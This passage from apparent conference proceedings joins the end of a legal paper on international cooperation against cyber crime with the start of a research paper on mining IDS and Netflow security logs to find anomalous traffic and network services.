worldwide, the perpetrators can plan a suitable cyber activity chain where the origin and jurisdiction of
relevant actors would first of all be difficult to determine and secondly, involve countries with a favourable
profile (Kaska, Tikk, 2009). To tackle this, the harmonisation of the laws addressing cyber crime plays an
important role in the procedural elements of criminal cooperation as the questions of jurisdiction are
either addressed directly by the national legislation or solved by the interpretation of general international
law principles.
256

Anna-Maria Talihärm
However, one should keep in mind that for several reasons jurisdiction may end up being only a formal
element of the problematic international prosecution (Brenner, Koops 2004). Recent case studies have
underlined that even if the undesirable conduct is criminalised in the domestic law of the country that
aims to initiate the prosecution as well as in a recipient jurisdiction, problems may still occur on a political
level. Therefore, similarly to any other investigation, the not cooperative political will of the requested
country or entity may significantly slow down or even disable the investigation and prosecution of any
cyber incident (Tikk, Kaska 2009).
Thereby, the traditional principles of territoriality, nationality and passive personality may no longer be
directly or strictly applicable in solving cyber incidents. Countries seem to be more willing to extend the
reach of relevant offences beyond the traditional jurisdiction principles such as stated in the CoE
Convention of Cybercrime, and as suggested by Ian Walden, states are thus losing to some extent the
“de jure control” over their sovereign state and trading it against an extended jurisdictional reach.
(Walden 2006)
4.2 Timeliness of the response
Based on the concerns of relevant national and international organisations, one of the key demands in
transnational investigations is the immediate reaction of the counterparts in the country where the
offender is located. Practice has shown that when it comes to quickly responding to official requests for
e.g. information exchange, the traditional instruments of mutual legal assistance do not, in most cases,
meet the requirements regarding the speed of investigations in the Internet and may thus jeopardize the
investigation of the offence.
If the location of the attacker has been identified, the least time-consuming way forward usually entails
the cooperation of law enforcement agencies through a joint investigation team. Using informal networks
and contacts might grant a more time-effective response but does not always permit using such evidence
in criminal procedure. This brings along several problems concerning the usability of evidence that has
not been gained via official procedures, and underlines the amount of time that characterises official
requests of mutual legal assistance. Considering the time-critical nature of cyber crime, six months of
waiting to receive the requested information through current official procedures, does not satisfy the
needs of investigation and prosecution of cyber crime. (Pau, 2011)
Similar challenge involves the lack of harmonisation of the legal framework regulating data retention
requirements for ISPs. Despite the efforts of the EU Data Retention Directive (European Union 2006), the
obligations of ISPs with respect to the retention of certain data may vary to a great degree (Paul, 2011)
and therefore do not always guarantee the availability of such data for the purposes of investigation,
detection and prosecution.
Among other options, solutions to such issues may include establishing practical and effective
cooperation networks. Moreover, according to CoE’s study, in order to render international cooperation
more effective, a set of practices should be used to establish uniformity of interactions between different
stakeholders (CoE 2008). A recent example of such cooperation between the Estonian Computer
Emergency Response Team (CERT) and one of the biggest local ISPs shows that public-private
partnership enhances ISPs’ ability to promptly inform its customers about possible security threats (Elion
2011). Another example of improving cooperation between public and private spheres is the Estonian
Cyber Defence League (CDL 2010).
4.3 Education and awareness
Not surprisingly, education and awareness of the complex spectrum of cyber threats form one of the
biggest challenges for effective international cooperation. The level of knowledge and expertise varies
within agencies and may cause significant problems in communication, quality of information sharing and
decision-making. For example, law enforcement agencies may not have the capacity to develop internal
expertise that is needed for communication with ISPs (CoE 2008) or the judicial system may not have the
technical knowledge to rightfully interpret the facts of the case.
Similarly, the lack of harmonised measures and procedural rules has rendered the majority of
stakeholders confused regarding the legal framework surrounding cyber crime and criminal cooperation.
Law enforcement agencies in particular are struggling with refining the legally and technically possible
measures that can be used in investigating crimes carried out via or targeting at computer systems. One
257

Anna-Maria Talihärm
among the many examples in this field is the Spanish case of law enforcement agencies conducting
warrantless Internet searches within the peer-to-peer file sharing programme in order to locate materials
of child pornography. In 2007, the Tarragona Regional Court questioned such police actions and ruled
the defendant to be innocent as the police actions were determined by the Court to have caused serious
harm to defendant’s fundamental right to secrecy in communications. However, in 2008 the Supreme
Court overruled this decision and stated that the purpose of these searches was to unveil the concealed
identity of those who had access to such files, and that the access to such information, considered illegal
or unlawful, may be carried out by any user since the information is public and had been disclosed by the
user itself. (Europa Press 2008)
Therefore, as underlined by the UN Intergovernmental Expert Group, there is a continuous need for more
research, awareness about international instruments as well as guidance on proper interpretation and
implementation (UNODC 2011).
4.4 Mandate
Analyses of the recent international developments have indicated that more and more nations and
institutions are realizing the importance of international criminal cooperation in the context of cyber crime
(Portnoy, Goodman 2009). One proof of this trend is that a growing number of national Computer
Emergency Response Teams (CERTs) are being set up and their operational powers are being
increased. Augmenting the mandate of other cyber crime related institutions is also a clear sign of
governments paying more attention to the coordination of international cooperation. Recent examples are
the European Union seeking to improve its institutional framework in the field and Estonia following the
trend by upgrading the Estonian Information Centre from a ministry-administered state agency into a
government agency with autonomous executive powers. (Pesur 2010)
4.5 Duplication of expert efforts
G8 was one of the first – followed by CoE, Interpol and others – to initiate a 24/7 network of experts of
cyber crime that was designed to facilitate the communication and investigations of law enforcement
agencies of different jurisdictions. The main idea of such a network is that even when the preliminary
communication is on informal bases, it can be carried out in a time-critical fashion. In the domain of
transnational crime, such consultation in timely manner may greatly facilitate reducing duplication of
effort, unnecessary inconvenience for witnesses or possible competition among law enforcement
agencies of the states concerned. (CoE 2001b)
However, there are several concerns regarding the functioning of these networks such as the technical
and legal competence of the contact points and the need for constantly updated contact information.
Even of a more urgent problem seems to be the confusion created by the partial overlap of different
networks such as the G8 and CoE contact lists. Despite efforts to merge the two networks, the contacts
lists have remained separate due to “a wider scope of functions of 24/7 contact points under the
Cybercrime Convention” (T-CY 2010).
The threat of duplication of expert efforts can also be observed in the field of criminal procedure, where
one of the main concerns is obtaining evidence in transnational context. This can be improved by
analyzing the current demands of law enforcement agencies for specific investigative provisions relating
to cyber crime and proposing necessary changes to multi- and bilateral agreements. Both formal and
informal networks may benefit international cooperation granted that sufficient standards and updated
contact information for communication are set.
5. Conclusion
Cyber crime does not always involve the traditional elements of a crime and hence, even determining
what should be considered an international matter in cyber crime cases is not always straightforward. It is
therefore vital that a thorough review of substantial and procedural law be undergone on the national
level before international cooperation could be effective, or even possible.
In addition to domestic legislation, investigating and prosecuting cyber incidents rarely involves only one
country and the widening range of cyber crime examples underlines the importance of a global network
and cooperation. The comparison of various international instruments has proved that multilateral treaties
are the most common and arguably most useful vehicles for harmonising national material law and
258

Anna-Maria Talihärm
minimising the differences in domestic approaches to substantial cyber crime and relevant procedural
aspects.
However, as illustrated by the small number of ratifications of the Council of Europe Convention of
Cybercrime, the practical applicability of the mentioned legal suggestions in the Convention is often
questionable. Therefore, an analysis of alternative international vehicles must be undergone and primary
international legal obstacles such as the lack of requisite procedural rules and finding effective means of
communication, addressed.
Additional challenges include the concerns of jurisdiction that despite possibly being considered as
merely a formal element on criminal cooperation, still remain the key to refining the scope of international
cooperation. It is clear that even if the identification of the source and technical attribution have been
successful, it is in the end international cooperation that leads to the capturing of the criminal. Lately,
countries seem to be more willing to review the traditional jurisdiction principles in order to gain extended
jurisdictional reach.
Also, uncertainties related to the implementation of the existing multi- and bilateral agreements are not
benefiting international cooperation. In terms of criminal procedure, one of the main concerns is to
improve obtaining evidence in transnational context. Thus, states are working on refining and improving
the legally and technically possible measures that can be used in prosecuting and investigating cyber
crime.
Analyses of the recent international developments indicate that more and more nations and institutions
are realizing the importance of international criminal cooperation in the context of cyber crime, and publicprivate
partnerships as well as other formal and informal networks are growingly contributing to solving
both national and international cyber incidents. Thus, another visible trend of criminal cooperation in the
field of cyber crime is the increasing number and the expanding mandate of specialised agencies
addressing cyber crime issues.
The challenges and trends above point to the overall need for more research, awareness about
international instruments as well as guidance toward proper interpretation and implementation. Perhaps
most importantly, these trends demonstrate that better coordination between relevant international
organisations and a comprehensive understanding of the already existing legal instruments would greatly
benefit the current state of international criminal cooperation in the cyber domain.
Disclaimer
The opinions expressed here are those of the author and should not be considered as the official policy
of the Cooperative Cyber Defence Centre of Excellence or NATO.
References
Blomfield, A. (2007). Estonia Calls for NATO Cyber-terrorism Strategy. Available at:
http://www.telegraph.co.uk/news/worldnews/1551963/Estonia-calls-for-Nato-cyber-terrorism-strategy.html.
Brenner, S. W. (2010). Cybercrime: Criminal Threats from Cyberspace. ABC-CLIO, California.
Brenner, S. W. and Koops, B.-J. (2004). “Approaches to Cybercrime Jurisdiction”. Journal of High Technology Law,
Vol. 4, No. 1.
Broadhurst, R. (2006). Developments in the global law enforcement of cyber-crime. An International Journal of Police
Strategies and Management 29(2). pp. 408-433.
CDL (2010). Cyber Defence League. Available at: http://www.kaitseliit.ee/index.php?op=body&cat_id=395.
European Union (2000). Council Act of 29 May 2000 establishing in accordance with Article 34 of the Treaty on
European Union the Convention on Mutual Assistance in Criminal Matters between the Member States of the
European Union.
Council of Europe (2001a). Convention on Cybercrime. Available at:
http://conventions.coe.int/treaty/en/treaties/html/185.htm.
Council of Europe (2001b). Convention of Cybercrime explanatory report. Available at:
http://conventions.coe.int/treaty/en/reports/html/185.htm.
European Union (2005). Council Framework Decision 2005/222/JHA of 24 February 2005 on attacks against
information systems. Official Journal L 69, 67-71.
European Union (2006). Directive 2006/24/EC of the European Parliament and of the Council of 15 March 2006 on
the retention of data generated or processed in connection with the provision of publicly available electronic
communications services or of public communications networks and amending. Official Journal L 105, 54-63.
259

Anna-Maria Talihärm
Council of Europe (2008). Law enforcement - Internet service provider cooperation in the investigation of cybercrime.
Available at:
http://www.coe.int/t/dghl/cooperation/economiccrime/cybercrime/Documents/LEA_ISP/default_en.asp.
Cryer, R. et al. (2007). An Introduction to International Criminal Law and Procedure, Cambridge University Press.
Cybercrime Convention Committee (T-CY) (2010). Fifth meeting Paris, 24-25 June 2010.
Elion (2011). Elion alustab arvutiviiruste ja pahavara vastest ennetustööd. Available at:
http://www.elion.ee/wwwmain?screenId=html.businessprofile.news&componentId=&actionId=&actionParam=49074&menuId=&locale=et&.
Europa Press (2008). Green light to warrantless internet searches by the police, available at:
http://www.madrid.org/cs/Satellite?c=CM_Revista_FP&cid=1142465573929&esArticulo=true&idRevistaElegida
=1142432125406&language=en&pagename=RevistaDatosPersonalesIngles%2FPage%2FRDPI_home_RDP&
siteName=RevistaDatosPersonalesIngles.
European Union (2009). Annex of Council Decision of 6 April 2009 establishing the European Police Office (Europol),
2009/371/JHA listing forms of serious crime which Europol is competent to deal with in accordance with Article
4(1) of the Council Decision.
Europol (2010a). Europol Overview, available at:
http://www.europol.europa.eu/index.asp?page=ataglance&language=.
Europol (2010b). Europol Strategy 2010–2014, available at:
http://register.consilium.europa.eu/pdf/en/10/st06/st06517.en10.pdf.
Kaska, K., Talihärm, A.-M., & Tikk, E. (2010). Building a Comprehensive Approach to Cyber Security. CCD COE
Publications. Tallinn.
Keyser, M. (2003) “The Council of Europe Convention on Cybercrime”. Journal of Transnational Law & Policy. Vol.
12, No. 2, page 289.
Pau, Eneli 2011. Interview with Ms Eneli Pau, Estonian Northern District Prosecutor’s Office, Assistant Prosecutor.
Conducted in January 2011 via email.
Pesur, V. (2010). Infosüsteemide arenduskeskus saab võimu juurde. Postimees Online, 13 May 2010. Available at:
http://www.postimees.ee/?id=262349.
Ploom, T. (2010). Strasbourgi konventsioonist Lissaboni lepinguni, rahvusvaheline koostöö kriminaalasjades.
Kirjastus Juura.
Portnoy, M. and Goodman, S. (2009). Global Initiatives to Secure Cyberspace: An Emerging Landscape. Springer
Science+Business Media.
Russell, S. et al. (2004). Cyber Criminals on Trial, Cambridge University Press.
Schaerlaekens, L. (2009). OLAF and its Cooperation with in Institutions of New Member States, ed. Joanna Apap,
Justice and Home Affairs in the EU: Liberty and Security Issues after Enlargement, p. 161.
Tikk, E. and Kaska, K. (2010). Legal Cooperation to Investigate Cyber Incidents: Estonian Case Study and Lessons”.
Proceedings of the 9th European Conference on Information Warfare and Security. Thessaloniki, pp. 288-295.
Tikk, E., Kaska, K., & Vihul, L. (2010). International Cyber Incidents: Legal Considerations. CCD COE Publications.
Tallinn.
United Nations (1994). International review of criminal policy - United Nations Manual on the prevention and control
of computer-related crime. No. 43/44.
United Nations (2000). Convention against Transnational Organized Crime, adopted by General Assembly resolution
55/25 of 15 November 2000.
United Nations (2004). Legislative Guides for the Implementation of the United Nations Convention against
Transnational Organized Crime, available at:
www.unodc.org/pdf/crime/legislative_guides/Legislative%20guides_Full%20version.pdf.
UNODC (2011). Open-ended Intergovernmental Expert Group on Cybercrime. Available at:
http://unodc.org/unodc/en/treaties/expert-group-on-cybercrime.html002E
260

Methods for Detecting Important Events and Knowledge
From Data Security Logs
Risto Vaarandi
CCD COE, Tallinn, Estonia
risto.vaarandi@ccdcoe.org
Abstract: In modern computer networks and IT systems, event logging is commonly used for collecting system
health information, in order to ease the system management process. For example, many sites are collecting events
and network flow records from their applications, servers, and network devices over protocols like syslog, SNMP and
Netflow, and analyze these data at central monitoring server(s). Among collected data, many events and records
provide information about security incidents. Unfortunately, during the last decade security logs have grown rapidly in
size, making the manual analysis extremely labor intensive task. This task is further complicated by the large number
of irrelevant records and false positive alerts in security logs. For this reason, the development of methods for
detecting important events and knowledge from security logs has become a key research issue during the recent
years. In our paper, we propose some methods for tackling this issue in the context of IDS and Netflow logs from an
organizational network. The first contribution of this paper is the study of important properties of IDS and Netflow
logs. We have conducted our analysis on a number of production system logs obtained from a large financial
institution, and some of our findings are supported by results from other researchers. The second contribution of the
paper is the proposal of several data mining based and heuristic methods for event and knowledge detection from
security logs. Our data mining methods are based on frequent itemset mining for identifying regularities in IDS alert
sets and network traffic. These regularities are then used for finding unexpected IDS alert patterns and prominent
network traffic flows. In this paper, we also discuss the implementations of the proposed methods in a production
environment, and provide performance estimates for our implementations. We conclude the paper with a short
discussion on some promising directions for further research.
Keywords: data mining, security log analysis
1. Introduction
In modern computer networks and IT systems, one of the key security management techniques is
network monitoring for detecting unwanted, malicious or anomalous traffic. Two widely employed
methods for network monitoring are the use of network intrusion detection system (IDS) and the
collection of network traffic information with protocols like Netflow or IPFIX. A network IDS sensor
performs deep packet inspection (DPI) for a network segment – for every packet that traverses the
segment, the sensor analyzes both the packet headers and its payload. Most network IDSs use signature
based approach for DPI – human experts write packet matching conditions (signatures), in order to
recognize known bad traffic (e.g., a signature could be a regular expression for matching the packet
payload). When network traffic matches a signature, IDS triggers an alert which is typically sent to the
central network management server. Unfortunately, IDSs are known to generate large volumes of alerts –
for example, a single IDS sensor can emit hundreds of thousands of alerts per day (Vaarandi and Podiņš
2010; Viinikka, Debar, Mé, Lehikoinen and Tarvainen 2009). Furthermore, usually the majority of these
alerts are false positives or irrelevant (Julisch 2001; Long, Schwartz and Stoecklin 2006; Vaarandi and
Podiņš 2010). Therefore, the manual review of IDS logs is often impossible.
In contrast, when network traffic information is collected from routers, switches or dedicated network
probes (with a protocol like Netflow), only data from packet headers are considered. For example, a
Netflow record contains a transport protocol ID (e.g., 6 for TCP), source and destination IP addresses,
source and destination ports (if supported by transport protocol), and a few other fields. A Netflow record
is created when the network device first observes relevant traffic flow (e.g., a TCP connection is
established from the workstation 10.2.1.13 port 21892 to the web server 10.1.1.1 port 80). Typically, the
network device sends the record to the central network management host when activity or inactivity timer
expires for the flow (e.g., no packets have travelled from source to destination during 15 seconds), when
the flow table becomes full, or when the flow ends (e.g., the corresponding TCP connection is
terminated). Since collecting network traffic information does not involve the packet payload analysis, it
requires much less computing resources than DPI. However, since in larger networks many millions of
flow records can be created within a short amount of time (Wagner 2008), processing and storing these
records is expensive in terms of CPU time and disk space. In order to reduce these costs, packet
sampling is usually employed in very large networks – traffic information is only extracted from a fraction
of packets (e.g., 0.1%). Nevertheless, packet sampling is often not used in the context of network security
261

Risto Vaarandi
monitoring, since this allows for recording all network packet flows between peers and thus for the
detection of unusual traffic patterns.
In this paper, we will focus on IDS and Netflow log analysis for organizational networks. We will first study
important properties of IDS and Netflow logs and will show that these data sets are prone to contain
strong patterns. We will then propose several heuristic and data mining based algorithms for analyzing
these logs. The remainder of this paper is organized as follows – section 2 describes related work,
section 3 focuses on properties of IDS and Netflow logs, section 4 describes log analysis algorithms
which harness these properties, and section 5 concludes the paper.
2. Related work
Since IDS and Netflow logs contain large volumes of data and it is highly impractical to review these logs
manually, their analysis has attracted a considerable amount of attention in the research community. A
number of methods have been proposed during the last decade, including machine learning (Pietraszek
2004), time series analysis (Viinikka, Debar, Mé and Séguier 2006; Viinikka, Debar, Mé, Lehikoinen and
Tarvainen 2009), the application of EWMA control charts (Viinikka and Debar 2004), visualization (Taylor,
Paterson, Glanfield, Gates, Brooks and McHugh 2009), the use of locality paradigm (McHugh and Gates
2003) and chronicles formalism (Morin and Debar 2003), the application of game theory (Wagner,
Wagener, State, Engel and Dulaunoy, 2010), graph based methods (Ning, Cui and Reeves 2002), etc.
Among recently proposed methods, data mining algorithms have been often suggested for IDS alert logs.
With these methods, IDS alert logs are mined for previously unknown regularities and irregularities. This
knowledge is then used by human experts for writing event correlation rules which highlight important
alerts and filter out large volumes of false positives and other irrelevant alerts. Long, Schwartz and
Stoecklin have developed a supervised clustering algorithm for distinguishing Snort IDS true alerts from
false positives (Long, Schwartz and Stoecklin 2006). Treinen and Thurimella have investigated the
application of association rule mining, in order to detect knowledge for writing event correlation rules for
novel attack types (Treinen and Thurimella 2006). Clifton and Gengo have suggested a similar approach
for creating IDS alert filters (Clifton and Gengo 2000). Julisch and Dacier have proposed a conceptual
clustering technique for IDS alert logs (Julisch 2001; Julisch and Dacier 2002; Julisch 2003). With this
approach, detected clusters correspond to alert descriptions, and the human expert can use them for
developing filtering and correlation rules for future IDS alerts. Al-Mamory, Zhang and Abbas have
proposed clustering algorithms for finding generalized alarms which help the human analyst to build filters
(Al-Mamory, Zhang and Abbas 2008; Al-Mamory and Zhang 2009). Vaarandi and Podiņš have developed
a novel data mining based method for IDS alert classification (Vaarandi and Podiņš 2010). The method
fully automates the knowledge interpretation process which has been traditionally carried out by human
experts, and derives alert classification rules without a human intervention. These rules are used for
distinguishing important alerts from irrelevant ones.
Various data mining methods have also been proposed for the analysis of Netflow logs. Wagner has
applied entropy measurement techniques to Netflow data, in order to detect worms in fast IP networks
(Wagner 2008). Paredes-Oliva et al. have employed a frequent itemset mining algorithm for identifying
traffic flows that are root-causes of network security anomalies (Paredes-Oliva, Dimitritopoulos, Molina,
Barlet-Ros and Brauckhoff 2010). Li and Deng have proposed several frequent pattern mining algorithms,
in order to detect network anomalies (Li and Deng 2010). Also, Vaarandi has proposed frequent itemset
mining for automated close-to-real-time identification of strong traffic patterns from Netflow logs (Vaarandi
2008).
3. Properties of IDS and Netflow logs
During our experiments, we have discovered several important properties of IDS and Netflow logs which
are confirmed by findings of other researchers. When investigating the properties of IDS alert log data,
we reviewed the yearly logs of three IDS sensors from a large financial institution. Sensors had more
than 15,000 signatures and were deployed in different locations (both in intranet and public Internet). Two
logs contained more than 50 million alerts and one log more than 2 million alerts.
Firstly, we found that majority of the alerts were triggered only by a few signatures – 10 most verbose
signatures created more than 95% of alerts for two sensors and more than 80% of alerts for one sensor.
Other researchers have reported similar findings – in (Viinikka, Debar, Mé and Séguier 2006) it was
found that 5 signatures produced 68% of alerts, while in (Viinikka, Debar, Mé, Lehikoinen and Tarvainen
2009) the authors discovered that 7 signatures produced 78% of alerts. Secondly, we found that prolific
262

Risto Vaarandi
signatures usually trigger large volumes of alerts over longer periods of time. For three aforementioned
sensors, less than 25 signatures triggered alerts for more than 300 days during 1 year period, and these
alerts constituted 70-90% of entries in the logs. Finally, vast majority of these verbose signatures trigger
false positives or irrelevant alerts. In our experimental environment, we found that they are mostly related
either to well-known threats (such as MS Slammer Sapphire worm) or legitimate network traffic (like
SNMP queries from network management servers). Similar findings have also been reported in (Viinikka,
Debar, Mé, Lehikoinen and Tarvainen 2009). Therefore, IDS alert logs contain strong patterns in many
environments, and these patterns describe commonly occurring irrelevant alerts.
For investigating the properties of organizational Netflow logs, we studied the log of a Netflow probe that
was deployed in a backbone network of a large financial institution. The probe collected information about
network traffic for hundreds of workstations, tens of servers and various other devices without packet
sampling. The log of the probe covered the period of 14 days and contained 104,142,530 Netflow
records. In order to detect changes in network usage patterns over time, we divided the 14 day (336
hour) log into 336 non-overlapping time frames, with each frame covering 1 hour. In the remainder of the
paper, destination address denotes the following tuple: (transport protocol ID, destination IP address,
destination port). Note that Netflow records for portless transport protocols (like ICMP) might use the
destination port field for specifying the type of the packet.
Firstly, we noticed that the number of distinct destination addresses is quite large for each time frame –
each frame contained an average of 309,948 records and an average of 103,335 destination addresses.
However, the majority of destination addresses (90-98%, an average of 92.6% per frame) were
associated with only one source IP address. Also, most such destination addresses appeared only in a
few records during short period of time. Furthermore, only 47-121 destination addresses had 20 or more
source IP addresses in a frame, but 35-46% of Netflow records represented the network traffic to these
few destinations. When we investigated these destination addresses more closely, we found that they
correspond to widely used network services (for example, corporate mail and web servers). Due to the
large volume of traffic going to these services, strong patterns that reflect this traffic show up in Netflow
logs.
Secondly, when analyzing the network traffic of workstations, we discovered that a typical workstation
communicates with a limited number of IP addresses within 1 hour time frame – the average number of
peer addresses per workstation ranged from 9.8 to 24.7 in 336 frames. Thirdly, we also found that many
workstations often communicate only with well-known network services which are simultaneously used by
several other network nodes. Inspecting 1 hour time frames revealed that 68-94% of workstations (an
average of 88.3% per frame) did only interact with network services used by at least 4 other nodes during
the same time frame. Other researchers have observed similar regularities in workstation network traffic
(McHugh and Gates 2003).
These properties of Netflow log data for organizational networks clearly indicate that such logs contain
strong patterns. Furthermore, these patterns often reflect the use of well-known network services (by
workstations and other legitimate clients). For these reasons, the emergence of new and unusual
patterns might be a symptom of an anomalous (and possibly malicious) network activity. In addition, the
discovery of network services from Netflow logs facilitates the identification of illegal services. In the
following section we will present several algorithms for addressing these issues.
4. Anomaly detection algorithms for Netflow and IDS logs
4.1 Frequent pattern mining from Netflow logs
In order to mine patterns from Netflow logs, we propose a frequent itemset mining based approach.
Although various frequent itemset mining algorithms have been often suggested for various log types
(see (Vaarandi 2004) for references), their application for Netflow data sets is fairly novel and we are
aware of only a few recent works (Vaarandi 2008; Paredes-Oliva, Dimitritopoulos, Molina, Barlet-Ros and
Brauckhoff 2010; Li and Deng 2010).
Let I = {i1,...,in} be a set of items. If X ⊆ I, X is called an itemset. A transaction is a tuple (tid, X), where tid
is a transaction identifier and X is an itemset. A transaction database D is a set of transactions, and the
support of an itemset X is the number of transactions that contain X: supp(X) = |{tid | (tid, Y) ∈ D, X ⊆ Y}|.
If s is a support threshold and supp(X) ≥ s, X is called a frequent itemset. Note that if the support
threshold is specified as a percentage p%, then s = |D|*p/100. If itemset X does not have any proper
263

Risto Vaarandi
supersets with the same support, X is called a closed itemset. In this paper, we focus on mining frequent
closed itemsets, since they are a compact and lossless representation of all frequent itemsets.
For mining patterns from Netflow logs, we are using LogHound data mining tool which has been
developed for efficient mining of very large logs (Vaarandi 2004). If a Netflow record reflects a flow of m
network packets between some source and destination transport address, we view this record as a set of
m transactions with identical itemset {(sourceIP,1), (sourcePort,2), (destinationIP,3), (destinationPort,4),
(protocol,5)}. In other words, we order the five relevant flow record attributes, in order to distinguish
identical values of different attributes during the mining. With this representation, each itemset describes
a traffic pattern, and the support of the itemset equals to the number of packets for this pattern. In the rest
of the paper, we use the terms pattern and itemset interchangeably. Figure 1 depicts some frequent
traffic patterns detected with LogHound.
* * 10.16.23.3 162 17
Support: 161657
10.12.47.1 993 * * 6
Support: 166959
10.13.25.14 80 10.11.48.44 1915 6
Support: 1211532
Figure 1: Sample traffic patterns detected with LogHound
The first pattern reveals that 161,657 UDP packets have been sent from various sources to SNMP trap
collector (port 162/udp) at 10.16.23.3, while the second pattern reflects 166,959 TCP packets sent to
various destinations from secure IMAP server (port 993/tcp) at 10.12.47.1. The third pattern indicates that
port 1915/tcp at the node 10.11.48.44 has received 1,211,532 TCP packets from the web server (port
80/tcp) at 10.13.25.14.
For mining traffic patterns from Netflow data, we propose the following framework. After every W second
time interval, frequent closed patterns are detected from the Netflow data of last W seconds and stored to
disk. The content of the file can be viewed over the web by the security administrators for getting a quick
overview of most prominent recent network traffic patterns. In addition, for each detected pattern the last
N pattern files are scanned, in order to detect in how many files the pattern is present. If the pattern has
occurred in less than K files, the pattern is highlighted as potentially anomalous.
We have implemented this framework for analyzing data from a Netflow probe in a backbone network of
a large financial institution (see section 3 for the probe deployment details). We measured the algorithm
performance during 21 days, with the support threshold set to 1%, W set to 3600 seconds, N set to 96
and K to 12. In other words, the algorithm mined patterns once in every hour, and highlighted each
pattern which had occurred in less than twelve 1-hour windows during the last 4 days. During the
experiment, 56-261 patterns were detected (an average of 182.5 per window), and 3-140 patterns were
highlighted (an average of 54.3 per window). All highlighted patterns corresponded to system and
network management activity which does not occur routinely on everyday basis. Thus the algorithm is
able to identify unusual strong network traffic patterns.
4.2 Network service detection from Netflow logs
Identification of network services in organizational networks is an important task. Firstly, new legitimate
services are discovered which eases the configuration management process. Secondly, unexpected or
illegal services might be found that violate security policies or have been created with malicious intentions
(e.g., for leaking data to Internet). Today, network services are often detected with dedicated
network/host scanning tools like Nmap. However, scanning larger networks is time-consuming and
requires a lot of network bandwidth. In addition, scanning is an intrusive technique which might alert the
illegal service provider. Furthermore, scanning could trigger many alarms in the security monitoring
system of the organization itself (e.g., host firewalls might report all their ports that were scanned).
Finally, the illegal service might be protected with a firewall, denying access for known security
monitoring hosts.
264

Risto Vaarandi
The approach proposed in section 4.1 is able to identify actively used network services which receive or
send large amounts of network packets. However, in many cases the amount of data sent and received
by services is modest. For example, during our experiments described in section 4.1 we discovered that
many services exchanged less packets with clients than the support threshold, and thus remained
undetected. Unfortunately, lowering the support threshold will substantially increase the number of
patterns, thus making it hard for the human to spot patterns that correspond to services. Furthermore,
mining large data sets with very low support thresholds will also increase the CPU and memory
consumption of the algorithm.
In this section, we propose a non-intrusive algorithm for real-time service detection from Netflow logs.
The algorithm processes Netflow records immediately after their arrival to the network monitoring server,
and employs the following heuristic – if the destination address is employed for providing an actively used
service, this address is likely to show up in Netflow logs repeatedly during longer periods of time. In
contrast, as discussed in section 3, most destination addresses appear only in few records during short
time.
The algorithm employs memory based lists L0,…,Ln for destination address analysis, where each list is
allocated for destination addresses with a certain number of associated source IP addresses. For each
list Li, Wi specifies the size of the analysis window in seconds and Ti the threshold for number of sources
(Tn is set to infinity; Ti < Ti+1 and Wi ≤ Wi+1, 0 ≤ i < n). These lists allow for treating more widely used
destination addresses differently during the analysis, and are also useful for the grouping purposes
during reporting.
For each incoming Netflow record, the algorithm applies the following steps:
1) extracts the source IP address S and destination address D from the Netflow record,
2) if D belongs to list Li, S is appended to the peer list PD; if during the last Wi seconds Ti distinct entries
were appended to PD, D is moved to list Li+1,
3) if D is not present in lists L0,…,Ln, D is inserted into list L0 and S is appended to PD.
After short time intervals (e.g., once in a second), the algorithm checks all destination addresses. If the
destination address D belongs to Li, entries appended to PD more that Wi seconds ago are removed for
memory saving purposes. Also, if the destination address D belongs to list Li (0 < i ≤ n) and during the
last Wi seconds less than Ti-1 distinct entries were appended to PD, D is moved to list Li-1. If the
destination address D belongs to L0 and during the last W0 seconds no entries were added to PD, D is
removed from L0.
It is easy to see that if the destination address is actively used by larger number of sources, it will be
promoted to higher level lists, while if the number of active peers decreases, the address will be moved
back to lower levels. If the address in L0 has been without peers for W0 seconds, it will be dropped from
memory. Otherwise it will stay in one of the lists and have a chance for promotion if its peer activity
increases. If T0 is set to 2, L0 will contain destination addresses with only one associated source during
the last W0 seconds. Since the majority of destination addresses do not correspond to network services
and appear briefly in a few records with one source only (see section 3), they will only stay in L0, being
dropped shortly after W0 seconds. Therefore, the algorithm will not consume large amounts of memory.
During our experiments, we have used the value of 3600 seconds for W0 which represents a good
tradeoff between low memory consumption and service detection precision. We have also set n to 3, W1
to 7200 seconds, both W2 and W3 to 1440 seconds, T0 to 2, T1 to 5, and T2 to 20. In other words, we
have used four lists for destination addresses with 1 source during 1 hour, with 2-4 sources during 2
hours, with 5-19 sources during 4 hours, and with 20 or more sources during 4 hours.
We have configured the algorithm to produce output in several ways:
A web report is created once in 5 minutes from destinations in lists L1,…,Ln,
When a new destination is created in L1 or an entry has stayed in L0 for more than K seconds, a
syslog message is produced about the appearance of new service (we have set K to 86400, in order
to detect services which have been consistently used by one peer during 1 day).
265

Risto Vaarandi
During the experiment of 14 days, the memory consumption of the algorithm was low as we had
expected. The L0, L1, L2, and L3 lists remained limited in size and contained 1054-3845, 95-445, 7-75,
and 45-133 entries, respectively. Also, 6381 syslog messages about the appearance of new services
were logged. However, 3267 (59%) of them were repeated messages about 656 well-known services (in
most cases, services were rediscovered after nightly peer inactivity). Among remaining 3114 messages,
some were false positives generated by a few network management hosts – since these nodes poll
network intensively over SNMP, UDP ports are sometimes reused for creating client sockets, thus these
ports enter the L1 list and are reported. We believe that if service syslog messages are correlated further,
their number could be reduced several times and false positives could be eliminated.
4.3 Frequent pattern mining from IDS logs
As discussed in section 2, most data mining based algorithms for IDS log analysis have been developed
for distinguishing important events from false positives and other background noise. However, in their
recent works Viinikka, Debar, Mé et al. have argued that it is equally important to detect unanticipated
changes in alarm flows (Viinikka, Debar, Mé and Séguier 2006; Viinikka, Debar, Mé, Lehikoinen and
Tarvainen 2009). Since the algorithm presented in section 4.1 detects unexpected strong patterns from
Netflow logs, we also propose this algorithm for IDS log analysis. In this section, we will briefly describe
the experiment results for IDS logs.
Similarly with Netflow logs, after every W seconds the algorithm mines frequent closed patterns from the
IDS log data of last W seconds. Patterns are both stored to file and used for creating a web report. Also,
patterns which appear in less than K of last N pattern files are highlighted.
We have applied the algorithm for an IDS sensor of a large financial institution, with the sensor being
deployed at the outer network perimeter. We measured the algorithm performance during 32 days, with
the support threshold set to 10, W set to 3600 seconds, N set to 96 and K to 12. During the experiment,
5-187 patterns were detected (an average of 22.2 per window), and 0-175 patterns were highlighted (an
average of 6.4 per window). Figure 2 presents some highlighted alert patterns (for the reasons of privacy,
IP addresses have been obfuscated).
1:2009414 TCP 10.175.178.182 * 10.1.1.1 80
1:2001219 TCP 10.55.173.56 * * 22
1:474 ICMP 10.37.237.66 – 10.1.1.1 –
Figure 2: Sample highlighted IDS alert patterns
